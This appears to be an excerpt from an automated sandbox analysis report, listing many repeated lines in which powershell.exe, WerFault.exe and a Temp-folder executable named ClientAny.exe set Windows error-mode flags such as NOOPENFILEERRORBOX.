Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ClientAny.exe	Process information set: NOOPENFILEERRORBOX
